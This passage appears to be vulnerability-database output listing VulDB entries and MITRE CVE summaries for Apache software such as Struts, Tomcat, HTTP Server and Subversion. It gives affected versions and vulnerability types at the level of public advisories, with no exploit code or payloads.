| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
| [65340] Apache Shindig 2.5.0 information disclosure
| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
| [10826] Apache Struts 2 File privilege escalation
| [65204] Apache Camel up to 2.10.1 unknown vulnerability
| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
| [64722] Apache XML Security for C++ Heap-based memory corruption
| [64719] Apache XML Security for C++ Heap-based memory corruption
| [64718] Apache XML Security for C++ verify denial of service
| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
| [64716] Apache XML Security for C++ spoofing
| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
| [64485] Apache Struts up to 2.2.3.0 privilege escalation
| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
| [64467] Apache Geronimo 3.0 memory corruption
| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
| [64457] Apache Struts up to 2.2.3.0 cross site scripting
| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
| [9184] Apache Qpid up to 0.20 SSL misconfiguration
| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
| [8873] Apache Struts 2.3.14 privilege escalation
| [8872] Apache Struts 2.3.14 privilege escalation
| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
| [64006] Apache ActiveMQ up to 5.7.0 denial of service
| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
| [8427] Apache Tomcat Session Transaction weak authentication
| [63960] Apache Maven 3.0.4 Default Configuration spoofing
| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
| [63750] Apache qpid up to 0.20 checkAvailable denial of service
| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
| [63747] Apache Rave up to 0.20 User Account information disclosure
| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
| [7687] Apache CXF up to 2.7.2 Token weak authentication
| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
| [63090] Apache Tomcat up to 4.1.24 denial of service
| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
| [62833] Apache CXF -/2.6.0 spoofing
| [62832] Apache Axis2 up to 1.6.2 spoofing
| [62831] Apache Axis up to 1.4 Java Message Service spoofing
| [62830] Apache Commons-httpclient 3.0 Payments spoofing
| [62826] Apache Libcloud up to 0.11.0 spoofing
| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
| [62661] Apache Axis2 unknown vulnerability
| [62658] Apache Axis2 unknown vulnerability
| [62467] Apache Qpid up to 0.17 denial of service
| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
| [6301] Apache HTTP Server mod_pagespeed cross site scripting
| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
| [62035] Apache Struts up to 2.3.4 denial of service
| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
| [61229] Apache Sling up to 2.1.1 denial of service
| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
| [61094] Apache Roller up to 5.0 cross site scripting
| [61093] Apache Roller up to 5.0 cross site request forgery
| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
| [60708] Apache Qpid 0.12 unknown vulnerability
| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
| [4882] Apache Wicket up to 1.5.4 directory traversal
| [4881] Apache Wicket up to 1.4.19 cross site scripting
| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
| [60352] Apache Struts up to 2.2.3 memory corruption
| [60153] Apache Portable Runtime up to 1.4.3 denial of service
| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
| [4571] Apache Struts up to 2.3.1.2 privilege escalation
| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
| [59888] Apache Tomcat up to 6.0.6 denial of service
| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
| [59850] Apache Geronimo up to 2.2.1 denial of service
| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
| [58413] Apache Tomcat up to 6.0.10 spoofing
| [58381] Apache Wicket up to 1.4.17 cross site scripting
| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
| [57568] Apache Archiva up to 1.3.4 cross site scripting
| [57567] Apache Archiva up to 1.3.4 cross site request forgery
| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
| [4355] Apache HTTP Server APR apr_fnmatch denial of service
| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
| [57425] Apache Struts up to 2.2.1.1 cross site scripting
| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
| [57025] Apache Tomcat up to 7.0.11 information disclosure
| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
| [56512] Apache Continuum up to 1.4.0 cross site scripting
| [4285] Apache Tomcat 5.x JVM getLocale denial of service
| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
| [4283] Apache Tomcat 5.x ServletContect privilege escalation
| [56441] Apache Tomcat up to 7.0.6 denial of service
| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
| [54693] Apache Traffic Server DNS Cache unknown vulnerability
| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
| [54012] Apache Tomcat up to 6.0.10 denial of service
| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
| [52894] Apache Tomcat up to 6.0.7 information disclosure
| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
| [52786] Apache Open For Business Project up to 09.04 cross site scripting
| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
| [52584] Apache CouchDB up to 0.10.1 information disclosure
| [51757] Apache HTTP Server 2.0.44 cross site scripting
| [51756] Apache HTTP Server 2.0.44 spoofing
| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
| [51690] Apache Tomcat up to 6.0 directory traversal
| [51689] Apache Tomcat up to 6.0 information disclosure
| [51688] Apache Tomcat up to 6.0 directory traversal
| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
| [50626] Apache Solr 1.0.0 cross site scripting
| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
| [47214] Apachefriends xampp 1.6.8 spoofing
| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
| [47162] Apachefriends XAMPP 1.4.4 weak authentication
| [47065] Apache Tomcat 4.1.23 cross site scripting
| [46834] Apache Tomcat up to 5.5.20 cross site scripting
| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
| [86625] Apache Struts directory traversal
| [44461] Apache Tomcat up to 5.5.0 information disclosure
| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
| [43663] Apache Tomcat up to 6.0.16 directory traversal
| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
| [43516] Apache Tomcat up to 4.1.20 directory traversal
| [43509] Apache Tomcat up to 6.0.13 cross site scripting
| [42637] Apache Tomcat up to 6.0.16 cross site scripting
| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
| [40924] Apache Tomcat up to 6.0.15 information disclosure
| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
| [40922] Apache Tomcat up to 6.0 information disclosure
| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
| [40656] Apache Tomcat 5.5.20 information disclosure
| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
| [40234] Apache Tomcat up to 6.0.15 directory traversal
| [40221] Apache HTTP Server 2.2.6 information disclosure
| [40027] David Castro Apache Authcas 0.4 sql injection
| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
| [3414] Apache Tomcat WebDAV Stored privilege escalation
| [39489] Apache Jakarta Slide up to 2.1 directory traversal
| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
| [38524] Apache Geronimo 2.0 unknown vulnerability
| [3256] Apache Tomcat up to 6.0.13 cross site scripting
| [38331] Apache Tomcat 4.1.24 information disclosure
| [38330] Apache Tomcat 4.1.24 information disclosure
| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
| [37292] Apache Tomcat up to 5.5.1 cross site scripting
| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
| [36225] XAMPP Apache Distribution 1.6.0a sql injection
| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
| [34252] Apache HTTP Server denial of service
| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
| [33877] Apache Opentaps 0.9.3 cross site scripting
| [33876] Apache Open For Business Project unknown vulnerability
| [33875] Apache Open For Business Project cross site scripting
| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
13839| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
13840| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
13841| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
13842| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
13843| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
13844| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
13845| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
13846| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
13847| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13848| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
13849| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
13850| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
13851| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
13852| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
